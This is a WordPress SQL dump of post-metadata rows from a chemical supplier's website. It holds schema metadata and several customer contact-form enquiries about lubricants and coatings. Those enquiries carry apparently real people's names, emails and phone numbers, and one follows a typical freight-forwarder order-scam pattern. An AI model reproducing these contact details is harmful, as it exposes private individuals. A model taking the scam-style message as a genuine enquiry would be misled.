INSERT INTO `wp_postmeta` VALUES (42918, 1057, '_schema_json_timestamp', '1502657404'); 
INSERT INTO `wp_postmeta` VALUES (42919, 439, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42921, 1059, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42927, 3678, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42928, 3678, '_schema_json_timestamp', '1502659840'); 
INSERT INTO `wp_postmeta` VALUES (42932, 887, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42933, 1049, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42934, 1049, '_schema_json_timestamp', '1502742396'); 
INSERT INTO `wp_postmeta` VALUES (42935, 1048, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42936, 1048, '_schema_json_timestamp', '1502663224'); 
INSERT INTO `wp_postmeta` VALUES (42937, 1904, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42938, 1904, '_schema_json_timestamp', '1502663439'); 
INSERT INTO `wp_postmeta` VALUES (42940, 1373, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42941, 1373, '_schema_json_timestamp', '1502664520'); 
INSERT INTO `wp_postmeta` VALUES (42942, 1050, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42943, 1050, '_schema_json_timestamp', '1502664878'); 
INSERT INTO `wp_postmeta` VALUES (42945, 1070, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42946, 1070, '_schema_json_timestamp', '1502666023'); 
INSERT INTO `wp_postmeta` VALUES (42947, 1047, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42948, 1047, '_schema_json_timestamp', '1502666832'); 
INSERT INTO `wp_postmeta` VALUES (42949, 1052, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42950, 1052, '_schema_json_timestamp', '1502666834'); 
INSERT INTO `wp_postmeta` VALUES (42952, 2651, '_schema_json_timestamp', '1503243606'); 
INSERT INTO `wp_postmeta` VALUES (42953, 1459, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42954, 1459, '_schema_json_timestamp', '1502666891'); 
INSERT INTO `wp_postmeta` VALUES (42957, 1051, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42958, 1051, '_schema_json_timestamp', '1502667159'); 
INSERT INTO `wp_postmeta` VALUES (42960, 1267, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42961, 1267, '_schema_json_timestamp', '1502667791'); 
INSERT INTO `wp_postmeta` VALUES (42962, 711, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42963, 711, '_schema_json_timestamp', '1502668584'); 
INSERT INTO `wp_postmeta` VALUES (42965, 1822, '_schema_json_timestamp', '1502975010'); 
INSERT INTO `wp_postmeta` VALUES (42967, 1281, '_schema_json_timestamp', '1502781438'); 
INSERT INTO `wp_postmeta` VALUES (42969, 1442, '_schema_json_timestamp', '1502995973'); 
INSERT INTO `wp_postmeta` VALUES (42971, 1717, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42972, 793, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42973, 793, '_schema_json_timestamp', '1502671962'); 
INSERT INTO `wp_postmeta` VALUES (42974, 686, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42975, 686, '_schema_json_timestamp', '1502672311'); 
INSERT INTO `wp_postmeta` VALUES (42977, 331, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42978, 331, '_schema_json_timestamp', '1502672744'); 
INSERT INTO `wp_postmeta` VALUES (42980, 4827, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (42981, 4827, '_seq_num', '884'); 
INSERT INTO `wp_postmeta` VALUES (42982, 4827, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (42983, 4827, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (42984, 4827, '_field_1', 'Sunny'); 
INSERT INTO `wp_postmeta` VALUES (42985, 4827, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (42986, 4827, '_field_2', 'sunnysun@frmaterial.com'); 
INSERT INTO `wp_postmeta` VALUES (42987, 4827, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (42988, 4827, '_field_3', 'This is Sunny from Furui New materials. We are the qualified distributor of Wacker, Dow and Evonik in China.\r\n\r\nAs the silicon conformal coating is unable to meet the increasing high-class demands in electronic area in China, we are looking for a new kind of urethane conformal coating and going to be the certificated distributor in China. Would you please let me know whether there is a product of urethane conformal coating belonging to your company and your distributor/channel management mechanism (the ways to be your qualified distributor)? \r\n\r\nThx in advance and Best regards.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (42989, 4827, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (42990, 4827, '_sub_id', '4827'); 
INSERT INTO `wp_postmeta` VALUES (42991, 709, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42992, 709, '_schema_json_timestamp', '1502673660'); 
INSERT INTO `wp_postmeta` VALUES (42993, 1264, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42995, 1125, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (42996, 1125, '_schema_json_timestamp', '1502674543'); 
INSERT INTO `wp_postmeta` VALUES (43004, 3297, '_schema_json_timestamp', '1502830609'); 
INSERT INTO `wp_postmeta` VALUES (43005, 237, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43006, 237, '_schema_json_timestamp', '1502677887'); 
INSERT INTO `wp_postmeta` VALUES (43007, 4181, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43008, 4181, '_schema_json_timestamp', '1502678455'); 
INSERT INTO `wp_postmeta` VALUES (43009, 755, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43010, 755, '_schema_json_timestamp', '1502678840'); 
INSERT INTO `wp_postmeta` VALUES (43012, 11, '_schema_json_timestamp', '1503000424'); 
INSERT INTO `wp_postmeta` VALUES (43014, 1277, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43015, 1277, '_schema_json_timestamp', '1502679540'); 
INSERT INTO `wp_postmeta` VALUES (43017, 1275, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43018, 1275, '_schema_json_timestamp', '1502680055'); 
INSERT INTO `wp_postmeta` VALUES (43022, 731, '_schema_json_timestamp', '1503360387'); 
INSERT INTO `wp_postmeta` VALUES (43026, 803, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43027, 803, '_schema_json_timestamp', '1502681760'); 
INSERT INTO `wp_postmeta` VALUES (43029, 927, '_schema_json_timestamp', '1503227743'); 
INSERT INTO `wp_postmeta` VALUES (43031, 756, '_schema_json_timestamp', '1503214400'); 
INSERT INTO `wp_postmeta` VALUES (43034, 1273, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43035, 1273, '_schema_json_timestamp', '1502682999'); 
INSERT INTO `wp_postmeta` VALUES (43038, 1284, '_schema_json_timestamp', '1503177701'); 
INSERT INTO `wp_postmeta` VALUES (43039, 2845, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43040, 2845, '_schema_json_timestamp', '1502685017'); 
INSERT INTO `wp_postmeta` VALUES (43041, 384, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43042, 384, '_schema_json_timestamp', '1502685034'); 
INSERT INTO `wp_postmeta` VALUES (43044, 401, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43045, 401, '_schema_json_timestamp', '1502685808'); 
INSERT INTO `wp_postmeta` VALUES (43046, 1038, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43047, 1038, '_schema_json_timestamp', '1502686095'); 
INSERT INTO `wp_postmeta` VALUES (43050, 1271, '_schema_json_timestamp', '1503342149'); 
INSERT INTO `wp_postmeta` VALUES (43051, 1044, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43052, 1044, '_schema_json_timestamp', '1502687600'); 
INSERT INTO `wp_postmeta` VALUES (43053, 1353, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43054, 1353, '_schema_json_timestamp', '1502688329'); 
INSERT INTO `wp_postmeta` VALUES (43058, 1731, '_schema_json_timestamp', '1503219509'); 
INSERT INTO `wp_postmeta` VALUES (43059, 1039, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43060, 1039, '_schema_json_timestamp', '1502690484'); 
INSERT INTO `wp_postmeta` VALUES (43061, 2323, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43062, 2323, '_schema_json_timestamp', '1502692055'); 
INSERT INTO `wp_postmeta` VALUES (43063, 303, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43066, 424, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43067, 424, '_schema_json_timestamp', '1502692833'); 
INSERT INTO `wp_postmeta` VALUES (43068, 1684, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43069, 1684, '_schema_json_timestamp', '1502693152'); 
INSERT INTO `wp_postmeta` VALUES (43071, 1036, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43072, 1036, '_schema_json_timestamp', '1502694211'); 
INSERT INTO `wp_postmeta` VALUES (43073, 1040, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43074, 1040, '_schema_json_timestamp', '1502694224'); 
INSERT INTO `wp_postmeta` VALUES (43078, 1775, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43079, 1775, '_schema_json_timestamp', '1502695279'); 
INSERT INTO `wp_postmeta` VALUES (43080, 2390, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:63:"https://www.miller-stephenson.com/krytox-automotive-lubricants/";}s:3:"url";s:63:"https://www.miller-stephenson.com/krytox-automotive-lubricants/";s:8:"headline";s:44:"Krytox Solutions for the Automotive Industry";s:13:"datePublished";s:25:"2016-10-07T16:00:04+00:00";s:12:"dateModified";s:25:"2016-10-12T19:52:10+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_295221404.jpg";s:5:"width";i:6000;s:6:"height";i:3500;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:48:"Automotive, Automotive Grease, Krytox, Lubricant";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:424:"Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs Powered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry. Whatever your engineering challenge—longer part life, extreme temperatures, reduced";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (43081, 2278, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43082, 2278, '_schema_json_timestamp', '1502695861'); 
INSERT INTO `wp_postmeta` VALUES (43085, 4828, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43086, 4828, '_seq_num', '885'); 
INSERT INTO `wp_postmeta` VALUES (43087, 4828, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43088, 4828, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43089, 4828, '_field_1', 'Larry E.Boor'); 
INSERT INTO `wp_postmeta` VALUES (43090, 4828, '_field_10', 'Larry&#039;s Hi-Lo Bakery'); 
INSERT INTO `wp_postmeta` VALUES (43091, 4828, '_field_2', 'lpboor@charter.net'); 
INSERT INTO `wp_postmeta` VALUES (43092, 4828, '_field_8', '(920) 457-5425'); 
INSERT INTO `wp_postmeta` VALUES (43093, 4828, '_field_3', 'Hi,\r\nLooking for a High Temp Lube for inside a Rotary Bakery Oven . Non food contact.No bad odors. Bushing and chain lube.\r\n 400-450 Degrees F.\r\nUsing Super flake Graphite Now.\r\n\r\nThanks\r\nLarry'); 
INSERT INTO `wp_postmeta` VALUES (43094, 4828, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43095, 4828, '_sub_id', '4828'); 
INSERT INTO `wp_postmeta` VALUES (43103, 546, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43104, 546, '_schema_json_timestamp', '1502698842'); 
INSERT INTO `wp_postmeta` VALUES (43105, 1400, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43106, 1400, '_schema_json_timestamp', '1502699708'); 
INSERT INTO `wp_postmeta` VALUES (43109, 3018, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43110, 3018, '_schema_json_timestamp', '1502700703'); 
INSERT INTO `wp_postmeta` VALUES (43113, 1056, '_schema_json_timestamp', '1503186560'); 
INSERT INTO `wp_postmeta` VALUES (43114, 1876, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43116, 1392, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43117, 1392, '_schema_json_timestamp', '1502718375'); 
INSERT INTO `wp_postmeta` VALUES (43119, 774, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43120, 774, '_schema_json_timestamp', '1502705345'); 
INSERT INTO `wp_postmeta` VALUES (43122, 2349, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43123, 2349, '_schema_json_timestamp', '1502705930'); 
INSERT INTO `wp_postmeta` VALUES (43125, 3325, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43126, 3325, '_schema_json_timestamp', '1502706849'); 
INSERT INTO `wp_postmeta` VALUES (43128, 2853, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43129, 2853, '_schema_json_timestamp', '1502793561'); 
INSERT INTO `wp_postmeta` VALUES (43137, 4178, '_schema_json_timestamp', '1503072814'); 
INSERT INTO `wp_postmeta` VALUES (43138, 4829, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43139, 4829, '_seq_num', '886'); 
INSERT INTO `wp_postmeta` VALUES (43140, 4829, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43141, 4829, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43142, 4829, '_field_1', 'barry dawson'); 
INSERT INTO `wp_postmeta` VALUES (43143, 4829, '_field_10', 'envogen u k ltd'); 
INSERT INTO `wp_postmeta` VALUES (43144, 4829, '_field_2', 'barry.dawson@envogen.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (43145, 4829, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (43146, 4829, '_field_3', 'do you have a uk distributor?\r\nwe are looking to purchase 5 kg of KRYTOX GPL 104 .PLEASE REPLY URGENTLY'); 
INSERT INTO `wp_postmeta` VALUES (43147, 4829, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43148, 4829, '_sub_id', '4829'); 
INSERT INTO `wp_postmeta` VALUES (43150, 1265, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43151, 1265, '_schema_json_timestamp', '1502710277'); 
INSERT INTO `wp_postmeta` VALUES (43155, 388, '_schema_json_timestamp', '1503369263'); 
INSERT INTO `wp_postmeta` VALUES (43157, 2, '_schema_json_timestamp', '1503264837'); 
INSERT INTO `wp_postmeta` VALUES (43159, 4092, '_schema_json_timestamp', '1503205458'); 
INSERT INTO `wp_postmeta` VALUES (43161, 1283, '_schema_json_timestamp', '1503024565'); 
INSERT INTO `wp_postmeta` VALUES (43163, 4830, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (43164, 4830, '_seq_num', '349'); 
INSERT INTO `wp_postmeta` VALUES (43165, 4830, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43166, 4830, '_field_12', 'Eddie Hofer'); 
INSERT INTO `wp_postmeta` VALUES (43167, 4830, '_field_13', 'Rockwell Collins'); 
INSERT INTO `wp_postmeta` VALUES (43168, 4830, '_field_18', 'procure through Wesco - Haas Chemical Management Service'); 
INSERT INTO `wp_postmeta` VALUES (43169, 4830, '_field_14', 'eddie.hofer@rockwellcollins.com'); 
INSERT INTO `wp_postmeta` VALUES (43170, 4830, '_field_15', '(319) 295-6350'); 
INSERT INTO `wp_postmeta` VALUES (43171, 4830, '_field_16', 'Wondering status on the MS-143E.  We received a note through our distributor that the material is no longer available.  Is the material obsolete or that version?  If the version what replaced the &quot;E&quot;?  Any insight into differences between the old and new would be appreciated.\r\n\r\nThanks!\r\nEddie'); 
INSERT INTO `wp_postmeta` VALUES (43172, 4830, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (43173, 4830, '_sub_id', '4830'); 
INSERT INTO `wp_postmeta` VALUES (43174, 4831, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43175, 4831, '_seq_num', '887'); 
INSERT INTO `wp_postmeta` VALUES (43176, 4831, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43177, 4831, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43178, 4831, '_field_1', 'Richard Hendren'); 
INSERT INTO `wp_postmeta` VALUES (43179, 4831, '_field_10', 'Institute of Nautical Archaeology'); 
INSERT INTO `wp_postmeta` VALUES (43180, 4831, '_field_2', 'Subvetpiper@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (43181, 4831, '_field_8', '(907) 320-0526'); 
INSERT INTO `wp_postmeta` VALUES (43182, 4831, '_field_3', 'Looking for the proper grease to lubricate the hatch seal gaskets on our hyperbaric chamber.\r\n\r\nKind regards,\r\nRich'); 
INSERT INTO `wp_postmeta` VALUES (43183, 4831, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43184, 4831, '_sub_id', '4831'); 
INSERT INTO `wp_postmeta` VALUES (43185, 3015, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:68:"https://www.miller-stephenson.com/ptfe-dry-film-mold-release-agents/";}s:3:"url";s:68:"https://www.miller-stephenson.com/ptfe-dry-film-mold-release-agents/";s:8:"headline";s:33:"PTFE Dry Film Mold Release Agents";s:13:"datePublished";s:25:"2016-11-14T18:51:07+00:00";s:12:"dateModified";s:25:"2016-12-22T16:50:00+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_401774137.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:26:"Miller-Stephenson Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:366:"[share title=""] PTFE Dry Film Mold Release Agents Optimized surface adhesion; No Post-Molding cleaning PTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:12:"Chris Pavlik";s:3:"url";s:59:"https://www.miller-stephenson.com/author/cpavlikmschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (43192, 2773, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:58:"https://www.miller-stephenson.com/military-spec-chemicals/";}s:3:"url";s:58:"https://www.miller-stephenson.com/military-spec-chemicals/";s:8:"headline";s:46:"Miller-Stephenson Military Spec Products / NSN";s:13:"datePublished";s:25:"2016-10-26T20:02:42+00:00";s:12:"dateModified";s:25:"2016-10-28T19:29:06+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_296498720.jpg";s:5:"width";i:5760;s:6:"height";i:3840;}s:14:"articleSection";s:26:"Miller-Stephenson Articles";s:8:"keywords";s:13:"Mil Spec, NSN";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:372:"Military Spec Chemicals and NSN Miller-Stephenson offers a wide variety of military spec chemicals and lubrication products. We carry: Solvent Cleaners Solvent Flux Removers Contact Cleaner Conformal Coatings Specialty Products Epoxy Resins / Curings Agents Release Agents / Dry Lubricants Krytox Performance Lubricants We have: Military Specifications (Mil-Spec) National";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (43210, 1065, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43218, 819, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43233, 1726, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43252, 382, '_schema_json_timestamp', '1503350923'); 
INSERT INTO `wp_postmeta` VALUES (43308, 1212, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43315, 1760, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43316, 1760, '_schema_json_timestamp', '1502760352'); 
INSERT INTO `wp_postmeta` VALUES (43318, 4225, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43319, 4225, '_schema_json_timestamp', '1502723851'); 
INSERT INTO `wp_postmeta` VALUES (43320, 4832, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43321, 4832, '_seq_num', '888'); 
INSERT INTO `wp_postmeta` VALUES (43322, 4832, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43323, 4832, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43324, 4832, '_field_1', 'lawrence Benton'); 
INSERT INTO `wp_postmeta` VALUES (43325, 4832, '_field_10', 'BENTON ENTERPRISE'); 
INSERT INTO `wp_postmeta` VALUES (43326, 4832, '_field_2', 'lawrencebenton360@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (43327, 4832, '_field_8', '(505) 498-7934'); 
INSERT INTO `wp_postmeta` VALUES (43328, 4832, '_field_3', 'Hello, \r\n          I hope this mail meets you well. I am mailing in request to place an order from your site. I would like you to put me through on how to go about it. I would also like to make use of our freight forwarder in picking up the items from your location and pay with my credit card. \r\n\r\nIf its okay by you, kindly get back to me so I can send you a list of Items needed from your site including Delivery address.\r\nAlso you will be referred to that our freight forwarder who handles our shipment, and once we receive the quote for the order, We will commence  payment with my master card and you don&#039;t have to worry about my card because it was issued to me in the united states. \r\nKindly get back to me if this is acceptable .\r\n\r\nNote: kindly let me know the minimum quantities that can be ordered if possible.\r\n\r\nBest regards'); 
INSERT INTO `wp_postmeta` VALUES (43329, 4832, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43330, 4832, '_sub_id', '4832'); 
INSERT INTO `wp_postmeta` VALUES (43331, 938, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43332, 4833, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (43333, 4833, '_seq_num', '350'); 
INSERT INTO `wp_postmeta` VALUES (43334, 4833, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43335, 4833, '_field_12', 'Morgan Wilson'); 
INSERT INTO `wp_postmeta` VALUES (43336, 4833, '_field_13', 'Wilson Composite Technology'); 
INSERT INTO `wp_postmeta` VALUES (43337, 4833, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (43338, 4833, '_field_14', 'msw135@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (43339, 4833, '_field_15', '(805) 503-9393'); 
INSERT INTO `wp_postmeta` VALUES (43340, 4833, '_field_16', 'We manufacture composite parts for small to mid size drones and make our own molds (RenShape and Acrylic materials predominately).  Molds can be either compression, closed vac bag or bladder and are high gloss.  Most are wet lay ups.  We are looking for permanent sealer and a release agent over which lacquer can be sprayed prior to lay up, with maintenance of high gloss finish. Oven cure temps range from 90 to 180 F. '); 
INSERT INTO `wp_postmeta` VALUES (43341, 4833, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (43342, 4833, '_sub_id', '4833'); 
INSERT INTO `wp_postmeta` VALUES (43343, 4834, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (43344, 4834, '_seq_num', '351'); 
INSERT INTO `wp_postmeta` VALUES (43345, 4834, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43346, 4834, '_field_12', 'Morgan Wilson'); 
INSERT INTO `wp_postmeta` VALUES (43347, 4834, '_field_13', 'Wilson Composite Technology'); 
INSERT INTO `wp_postmeta` VALUES (43348, 4834, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (43349, 4834, '_field_14', 'msw135@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (43350, 4834, '_field_15', '(805) 503-9493'); 
INSERT INTO `wp_postmeta` VALUES (43351, 4834, '_field_16', 'We manufacture composite parts for small to mid size drones and make our own molds (RenShape and Acrylic materials predominately).  Molds can be either compression, closed vac bag or bladder and are high gloss.  Most are wet lay ups.  We are looking for permanent sealer and a release agent over which lacquer can be sprayed prior to lay up, with maintenance of high gloss finish. Oven cure temps range from 90 to 180 F. '); 
INSERT INTO `wp_postmeta` VALUES (43352, 4834, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (43353, 4834, '_sub_id', '4834'); 
INSERT INTO `wp_postmeta` VALUES (43354, 1241, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43355, 1241, '_schema_json_timestamp', '1502729894'); 
INSERT INTO `wp_postmeta` VALUES (43356, 2546, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43357, 2546, '_schema_json_timestamp', '1502730310'); 
INSERT INTO `wp_postmeta` VALUES (43360, 1901, '_schema_json_timestamp', '1502867906'); 
INSERT INTO `wp_postmeta` VALUES (43361, 4835, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43362, 4835, '_seq_num', '889'); 
INSERT INTO `wp_postmeta` VALUES (43363, 4835, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43364, 4835, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43365, 4835, '_field_1', 'Marek Kaplo'); 
INSERT INTO `wp_postmeta` VALUES (43366, 4835, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (43367, 4835, '_field_2', 'marek.kaplo.civ@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (43368, 4835, '_field_8', '(973) 724-6235'); 
INSERT INTO `wp_postmeta` VALUES (43369, 4835, '_field_3', 'Hello,\r\nI&#039;m looking for MSDS for MS-470S. Thank you.\r\nMarek'); 
INSERT INTO `wp_postmeta` VALUES (43370, 4835, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43371, 4835, '_sub_id', '4835'); 
INSERT INTO `wp_postmeta` VALUES (43373, 1987, '_schema_json_timestamp', '1503352097'); 
INSERT INTO `wp_postmeta` VALUES (43374, 644, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (43375, 644, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (43376, 644, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (43377, 644, '_ywtm_title_tab_description', 'Description'); 
